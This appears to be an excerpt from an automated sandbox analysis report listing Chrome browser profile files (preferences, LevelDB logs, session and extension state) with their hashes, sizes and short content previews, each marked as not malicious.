                                                                                                                                                SHA-256:92EE68E061C0E63F5C2FFAE49B08F8F043D39A755B6534C62EED4C2C36EFF2DB
                                                                                                                                                SHA-512:0E26A621E1D22EB7EE984D99629D0457199BB2A0C46A49D1C4391B5DD420C5874BD232B84A9D3A027D8FBA6B074661779053564DFE8B1CB5A7652E58E9DFD790
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799845608"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\5ebd71b0-feab-4966-8817-fc85f426ba9f.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185223
                                                                                                                                                Entropy (8bit):6.076780431502545
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:hgLLD8n55EtvVAkRNGWr9x39UfkT7RdOADfFcbXafIB0u1GOJmA3iuRw:mLLD8Qtdf0S39U6TltaqfIlUOoSiuRw
                                                                                                                                                MD5:C6253FD173F227E4E7F1D3EE08B8F6E0
                                                                                                                                                SHA1:E47BBBFAEE3A8AB40D874B80A6567A1F29919548
                                                                                                                                                SHA-256:75D32CFD112422BB63CB13795D6E93350D085BB509A1DD2E380B202F2A9C32E7
                                                                                                                                                SHA-512:DC5CD4C2B983686ECF7DCD5A0AB3624AA95F59868B2D2CA23DC983D50576556090AEB3733F6BCA0D50C0962B64A7659321E4BA6055ADE9EE910BDEF0E8484B72
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\5ffecbc7-f9d0-4765-9d05-d84937d0bf6a.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):97460
                                                                                                                                                Entropy (8bit):3.7500740509204293
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:sK34dqKZGMX8OPsvvV4+lENtrevx73CV7+Hv6GOxrcfVhxCrD/SrApm4Mqcb1Flm:T346K+59CXIOge7tD3Q3rG/KxPNTw
                                                                                                                                                MD5:6A8E3D13A5556A0CF18EE6B5E948051D
                                                                                                                                                SHA1:57301E22657F904D0F48AF9035004AB24AADAA66
                                                                                                                                                SHA-256:6D838678FA265E00EBDC97F464EC7201EF556914FC2D690088E0B59BC5D7FBC3
                                                                                                                                                SHA-512:AC6DBB5D4797D30B8191ED7329D46B537BA459E620468650E521D48FDE5DE62DB0DB3EC8D962E0C2C82DB19730A0BE25918BC0AB8B120DC2985C510D635A3DF6
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: .|..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....I8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\8ed402ed-9f0d-4bfa-a526-42c4e63459a4.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):185223
                                                                                                                                                Entropy (8bit):6.076780431502545
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:hgLLD8n55EtvVAkRNGWr9x39UfkT7RdOADfFcbXafIB0u1GOJmA3iuRw:mLLD8Qtdf0S39U6TltaqfIlUOoSiuRw
                                                                                                                                                MD5:C6253FD173F227E4E7F1D3EE08B8F6E0
                                                                                                                                                SHA1:E47BBBFAEE3A8AB40D874B80A6567A1F29919548
                                                                                                                                                SHA-256:75D32CFD112422BB63CB13795D6E93350D085BB509A1DD2E380B202F2A9C32E7
                                                                                                                                                SHA-512:DC5CD4C2B983686ECF7DCD5A0AB3624AA95F59868B2D2CA23DC983D50576556090AEB3733F6BCA0D50C0962B64A7659321E4BA6055ADE9EE910BDEF0E8484B72
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40
                                                                                                                                                Entropy (8bit):3.254162526001658
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:FkXft0xE1n:+ftIE1n
                                                                                                                                                MD5:BD4642AD6C750A12D912B20BCB92E14D
                                                                                                                                                SHA1:C549F0F48FDD4FBC62E51AC26D7E185160CE2123
                                                                                                                                                SHA-256:4FD71FE78DFE203137C89C9FB0734358FF432F2BC83338112DC7B830F9B30F2C
                                                                                                                                                SHA-512:04410D12EF327614C3AF1251C9906BFEB2977211A7F53CBB08A8C01F9465A382CD001E51AB936A0D196D359F1DECDDAEAF5E7D1DBD49CE5F4FF91BF5C332B6CF
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: sdPC....................s}.....M..2.!..%
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\01ab4a26-c84a-4892-a73a-1a76565e8bda.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5193
                                                                                                                                                Entropy (8bit):4.979900818343623
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:n8pCFcqX9pcKI1Vok0JCKL8aPQkNNMkZpbOTQVuwn:n8pCFF9pcj04Kukv/
                                                                                                                                                MD5:F40CC1605A6D5FAD4929C5FEFF714C6B
                                                                                                                                                SHA1:0D4E880D4BDD0DDF03591242FF448FF9ACB60719
                                                                                                                                                SHA-256:C70C793088B14C73D04D05D4518B31C5734DF395AA4062D5D07F8E4CD1412D51
                                                                                                                                                SHA-512:DB058CD1700DAB2993DAC4A4D94E0AABE937A0D43E190C4211F4A6A21D5136AB5B1389A19D71C91EBA86915869739D1B76EF7E4E7101327E5603C1EA1142EC72
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13280015426034104","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\5f710deb-912f-40ef-aec8-6dfa68ef8525.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5193
                                                                                                                                                Entropy (8bit):4.978422207122921
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:n8pCFc5I9pcKI1fok0JCKL8aTkjumbOTQVuwn:n8pCF/9pcja4KJkjL
                                                                                                                                                MD5:EE0754416F54375288C9950DAF72542A
                                                                                                                                                SHA1:F7EC603343910D680E0A9EE4416F3DF982F79598
                                                                                                                                                SHA-256:E148266E52AE28915E86890469C01CE201183E6991823382AB0A0FE6681550BA
                                                                                                                                                SHA-512:74DE81A3F44347423BF756953DF5DD52C4809EA29B7D745541C427131C08D03BE7AB7F200064F56E02557064EE848BD3A27EDE2D7A8A55A1679F00E7374D8E20
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13280015426034104","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\7d92133c-777e-4084-a984-5737bc2935d0.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16745
                                                                                                                                                Entropy (8bit):5.57736597591648
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:/cTtwLlG7Xk1kXqKf/pUZNCgVLH2HfDPrUdDLo4K:hLlAk1kXqKf/pUZNCgVLH2HfrrUBod
                                                                                                                                                MD5:C07E3F5EA2C2CC872B66432A983028A6
                                                                                                                                                SHA1:C5F107707761B9BCACF3F055267CC3FCB303312F
                                                                                                                                                SHA-256:5578698169AD8171E228B57F50FE7280EEBFE7E4896CC935AAEAFC16B8EB017C
                                                                                                                                                SHA-512:B59897A29DAD3A1BCB192CB8489825B9532D553C5820256AAA25EFE9B53CF5FFA5423AA0098EFE22C5CEB308A874CE858FAE08CFAB9213A24FB9B52D95C713C2
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13280015424813965","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):331
                                                                                                                                                Entropy (8bit):5.2131284716711255
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRmdVOq2PWXp+N23iKKdK9RXXTZIFUtnEeRmdjXZmwBEeRmdQDkwOWXp+N23/:pv+Ova5Kk7XT2FUtnvq/Bv15f5Kk7XVJ
                                                                                                                                                MD5:24E9100145747BAA4C3889A9C5C206DB
                                                                                                                                                SHA1:0BB53B2828C801DA97F3BE448D10AFF8D9FB521D
                                                                                                                                                SHA-256:E9F670384287EAAC2342064D0B8264965BC55F9929700AD54D688A664D172BCC
                                                                                                                                                SHA-512:FC6F76775DA866E3C19147610B2BB0212899988DBC3C7B833EAF7CE962522402EBC8DFD142D6885AE196EC38BC8F69F2119BB5F59899094BB808CC0EBF39D983
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:44.182 8f4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/MANIFEST-000001.2021/10/29-14:10:44.184 8f4 Recovering log #3.2021/10/29-14:10:44.185 8f4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG.old+. (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):331
                                                                                                                                                Entropy (8bit):5.2131284716711255
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRmdVOq2PWXp+N23iKKdK9RXXTZIFUtnEeRmdjXZmwBEeRmdQDkwOWXp+N23/:pv+Ova5Kk7XT2FUtnvq/Bv15f5Kk7XVJ
                                                                                                                                                MD5:24E9100145747BAA4C3889A9C5C206DB
                                                                                                                                                SHA1:0BB53B2828C801DA97F3BE448D10AFF8D9FB521D
                                                                                                                                                SHA-256:E9F670384287EAAC2342064D0B8264965BC55F9929700AD54D688A664D172BCC
                                                                                                                                                SHA-512:FC6F76775DA866E3C19147610B2BB0212899988DBC3C7B833EAF7CE962522402EBC8DFD142D6885AE196EC38BC8F69F2119BB5F59899094BB808CC0EBF39D983
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:44.182 8f4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/MANIFEST-000001.2021/10/29-14:10:44.184 8f4 Recovering log #3.2021/10/29-14:10:44.185 8f4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/000003.log .
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):315
Entropy (8bit):5.217993576664083
Encrypted:false
SSDEEP:6:maEeRm/4q2PWXp+N23iKKdKyDZIFUtnEeRmbZmwBEeRmKFkwOWXp+N23iKKdKyJd:pvLva5Kk02FUtnv4/BvnF5f5KkWJ
MD5:FB49EA72F90C78269BF908408C05B028
SHA1:C9A4A332D07F5E787841B0EAD9DCB6E0EBFB0F08
SHA-256:1C9C62B45107367F1CB20F9AE47E8C4C097D314E3726F12E0FE94AD74BFAC518
SHA-512:251C941212BCD389FE22885345A372F658DEE245AD8F0023FE8AD5350CA75111FD45E5DEABB668D8146C88C7CD81BFE44C8E109FB49DD06E9402C72C1EBB15D9
Malicious:false
Reputation:unknown
Preview: 2021/10/29-14:10:44.113 8f4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/MANIFEST-000001.2021/10/29-14:10:44.177 8f4 Recovering log #3.2021/10/29-14:10:44.178 8f4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/000003.log .
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG.old.. (copy)
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):315
Entropy (8bit):5.217993576664083
Encrypted:false
SSDEEP:6:maEeRm/4q2PWXp+N23iKKdKyDZIFUtnEeRmbZmwBEeRmKFkwOWXp+N23iKKdKyJd:pvLva5Kk02FUtnv4/BvnF5f5KkWJ
MD5:FB49EA72F90C78269BF908408C05B028
SHA1:C9A4A332D07F5E787841B0EAD9DCB6E0EBFB0F08
SHA-256:1C9C62B45107367F1CB20F9AE47E8C4C097D314E3726F12E0FE94AD74BFAC518
SHA-512:251C941212BCD389FE22885345A372F658DEE245AD8F0023FE8AD5350CA75111FD45E5DEABB668D8146C88C7CD81BFE44C8E109FB49DD06E9402C72C1EBB15D9
Malicious:false
Reputation:unknown
Preview: 2021/10/29-14:10:44.113 8f4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/MANIFEST-000001.2021/10/29-14:10:44.177 8f4 Recovering log #3.2021/10/29-14:10:44.178 8f4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/000003.log .
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Session
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:data
Category:dropped
Size (bytes):13448
Entropy (8bit):3.496787945228552
Encrypted:false
SSDEEP:96:34gHv2EhZk9Sly2gLThZk9Q78l4I2gLhhZk9Q78lwg8R2pLchZxo7plWK2pLEhZG:3HnE/DC9PNWStdSG
MD5:C9C2061CD45FF26018679E016E8F308F
SHA1:775E768E6E959030005BB9C5766B013037878423
SHA-256:E1C44F7A439CDBFF47343B478E2DA39FB8C4BFE73D16420BA5A59EAD5F6166E8
SHA-512:D844220BA9297BE2B1DA3673B058AA466EDB386EDEC17B721586B8DC4FB3CA7D0ED65BE9123FF2290CE4E96E74E0D0FF8C1EA02A81701634F3A1C03EB9E1A0A7
Malicious:false
Reputation:unknown
Preview: SNSS....................................................!.............................................1..,.......$...4325d4a0_5254_4d0f_a259_2eb450f69d61......................%...................................................................................5..0.......&...{AE32626E-B2F7-4664-89C4-2B2C2DB60905}........................!.............................................1..,.......$...2d3ff34f_df6a_4e93_8e40_05f7b18759b4......................y.....................................https://docs.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0......................................................h.......`.......................................................h..A....i..A............(...............................l.......h.t.t.p.s.:././.d.o.c.s...m.i.c.r.o.s.o.f.t...c.o.m./.e.n.-.u.s./.d.o.t.n.e.t./.f.r.a.m.e.w.o.r.k./.i.n.s.t.a.l.l./.a.p.p.l.i.c.a.t.i.o.n.-.n.o.t.-
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:data
Category:dropped
Size (bytes):1368
Entropy (8bit):1.8784775129881184
Encrypted:false
SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWe:
MD5:6C88FEEDEE47B405DCBB87ABEBC47027
SHA1:C28B0EB68BAB44D7D6F514351A3BDFCD70A3941E
SHA-256:153DDD24CD5DBCA43DC2071DDF4BE156DCBF32FB3338A2815023358A9740F708
SHA-512:A78C7A534278ADF5D741C721D7109E0E421C3C43EF0E3E4265E9A9BA9AECD8E1FC14268183CE5CCA79523D1B1554AA29E708DF54023720D37929658359E242AE
Malicious:false
Reputation:unknown
Preview: .f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):317
Entropy (8bit):5.232662299260004
Encrypted:false
SSDEEP:6:maEeXSmSVq2PWXp+N23iKKdK8NIFUtnEeXSYgZmwBEeXSzIkwOWXp+N23iKKdK8n:pvXSJVva5KkpFUtnvXSYg/BvXSzI5f5c
MD5:E2040ED7DBD41A2D5AF72A9C334618CF
SHA1:9628732D47A6E8B609562DA46C55E4DC820C891B
SHA-256:CE2B8B548F018AEDDFD13EB20D76923E2D715239452D5ABC3B882C59C4D12DC3
SHA-512:18DFC5AB6DBBEC50D6E19865103D8E65A31F315AF62B80A6353BAC950180721A52FA7D5D2F533F6C80C146F825313458C7367EF140477DC3A748094BFDA3DD59
Malicious:false
Reputation:unknown
Preview: 2021/10/29-14:10:27.505 8e4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/MANIFEST-000001.2021/10/29-14:10:27.506 8e4 Recovering log #3.2021/10/29-14:10:27.507 8e4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/000003.log .
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old. (copy)
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):317
Entropy (8bit):5.232662299260004
Encrypted:false
SSDEEP:6:maEeXSmSVq2PWXp+N23iKKdK8NIFUtnEeXSYgZmwBEeXSzIkwOWXp+N23iKKdK8n:pvXSJVva5KkpFUtnvXSYg/BvXSzI5f5c
MD5:E2040ED7DBD41A2D5AF72A9C334618CF
SHA1:9628732D47A6E8B609562DA46C55E4DC820C891B
SHA-256:CE2B8B548F018AEDDFD13EB20D76923E2D715239452D5ABC3B882C59C4D12DC3
SHA-512:18DFC5AB6DBBEC50D6E19865103D8E65A31F315AF62B80A6353BAC950180721A52FA7D5D2F533F6C80C146F825313458C7367EF140477DC3A748094BFDA3DD59
Malicious:false
Reputation:unknown
Preview: 2021/10/29-14:10:27.505 8e4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/MANIFEST-000001.2021/10/29-14:10:27.506 8e4 Recovering log #3.2021/10/29-14:10:27.507 8e4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/000003.log .
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:data
Category:dropped
Size (bytes):38
Entropy (8bit):1.8784775129881184
Encrypted:false
SSDEEP:3:FQxlXNQxlX:qTCT
MD5:51A2CBB807F5085530DEC18E45CB8569
SHA1:7AD88CD3DE5844C7FC269C4500228A630016AB5B
SHA-256:1C43A1BDA1E458863C46DFAE7FB43BFB3E27802169F37320399B1DD799A819AC
SHA-512:B643A8FA75EDA90C89AB98F79D4D022BB81F1F62F50ED4E5440F487F22D1163671EC3AE73C4742C11830214173FF2935C785018318F4A4CAD413AE4EEEF985DF
Malicious:false
Reputation:unknown
Preview: .f.5................f.5...............
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):372
Entropy (8bit):5.259827089317539
Encrypted:false
SSDEEP:6:maEeRWvUf4q2PWXp+N23iKKdK25+Xqx8chI+IFUtnEeRWlJZmwBEeRWlDkwOWXpi:pvv4va5KkTXfchI3FUtnvkJ/BvkD5f5G
MD5:647AC9965A71591C224C5EFF662A5EC4
SHA1:566B28A50B3159789A62B811842500274A9D3611
SHA-256:AD79970F9BECA6486DDEBB9AEDD6139F616433DF2B6A39DAEA4C559CF6AFF6EA
SHA-512:29F8F13DBF8D7AB3E51C39A390866C7B5728B7FBD12E275ED27679D8536205292A974DD368FDD690D59003DDCF2A52EF343865D0F53B49FCA6DBED8DA4A0A82B
Malicious:false
Reputation:unknown
